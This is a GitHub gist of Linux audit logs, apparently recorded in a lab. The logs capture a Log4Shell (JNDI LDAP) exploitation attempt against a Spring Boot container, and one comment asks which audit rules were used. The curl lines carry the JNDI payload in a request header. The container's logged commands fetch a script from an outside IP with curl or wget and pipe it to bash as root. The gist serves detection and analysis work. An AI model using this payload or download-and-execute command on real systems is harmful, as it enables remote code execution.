@Samirbous
Created December 13, 2021 08:37
type=PROCTITLE msg=audit(12/13/2021 01:49:50.838:66) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=1 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=0 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:49:50.838:66) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:49:50.838:66) : argc=1 a0=clear
type=SYSCALL msg=audit(12/13/2021 01:49:50.838:66) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x5613225618a0 a1=0x56132257a310 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4461 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=clear exe=/usr/bin/clear subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:49:57.714:153) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:49:57.714:153) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:49:57.714:153) : argc=4 a0=curl a1=127.0.0.1:4444 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:49:57.714:153) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322584a10 a1=0x56132256ecb0 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4462 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:47.999:702) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:47.999:702) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:50:47.999:702) : argc=4 a0=curl a1=127.0.0.1:8080 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:50:47.999:702) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322573a60 a1=0x561322570720 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4463 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:48.203:1333) : proctitle=java -jar /app/spring-boot-application.jar
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=1 name=/bin/sh inode=3168868 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=0 name=/bin/sh inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:48.203:1333) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:48.203:1333) : argc=3 a0=/bin/sh a1=-c a2=(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:48.203:1333) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:48.203:1333) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x55602e0da8c0 a1=0x55602dffd3c0 a2=0x7fffced4b0a8 a3=0x8080808080808080 items=3 ppid=1797 pid=4468 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=sh exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:48.267:1525) : proctitle=/bin/sh -c (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=1 name=/usr/bin/wget inode=3169734 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=0 name=/usr/bin/wget inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:48.267:1525) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:48.267:1525) : argc=4 a0=wget a1=-q a2=-O- a3=80.71.158.12/lh.sh
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:48.267:1525) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:48.267:1525) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f07b0598e38 a1=0x7f07b0598db8 a2=0x7f07b0598de0 a3=0x8080808080808080 items=3 ppid=4468 pid=4470 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=wget exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.740:1609) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.740:1609) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:50:50.740:1609) : argc=4 a0=curl a1=127.0.0.1:8080 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:50:50.740:1609) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322570e40 a1=0x561322570720 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4472 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.796:2229) : proctitle=java -jar /app/spring-boot-application.jar
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=1 name=/bin/sh inode=3168868 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=0 name=/bin/sh inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.796:2229) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:50.796:2229) : argc=3 a0=/bin/sh a1=-c a2=(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:50.796:2229) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:50.796:2229) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x55602dfde360 a1=0x55602ec1ec80 a2=0x7fffced4b0a8 a3=0x8080808080808080 items=3 ppid=1797 pid=4476 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=sh exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.796:2305) : proctitle=/bin/sh -c (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=1 name=/usr/bin/wget inode=3169734 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=0 name=/usr/bin/wget inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.796:2305) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:50.796:2305) : argc=4 a0=wget a1=-q a2=-O- a3=80.71.158.12/lh.sh
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:50.796:2305) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:50.796:2305) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f152e291e38 a1=0x7f152e291db8 a2=0x7f152e291de0 a3=0x8080808080808080 items=3 ppid=4476 pid=4477 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=wget exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:51:32.457:2554) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=1 name=/usr/bin/sudo inode=4210977 dev=08:01 mode=file,suid,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=0 name=/usr/bin/sudo inode=4210977 dev=08:01 mode=file,suid,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:51:32.457:2554) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:51:32.457:2554) : argc=5 a0=sudo a1=ausearch a2=-i a3=-sc a4=execve
type=SYSCALL msg=audit(12/13/2021 01:51:32.457:2554) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322588ec0 a1=0x561322565bc0 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4482 auid=kali uid=kali gid=kali euid=root suid=root fsuid=root egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=sudo exe=/usr/bin/sudo subj==unconfined key=(null)
@crypticsnail
@Samirbous Hi, are you able to share the specific rule(s) that generated this output from the audit.rules file? Thank you.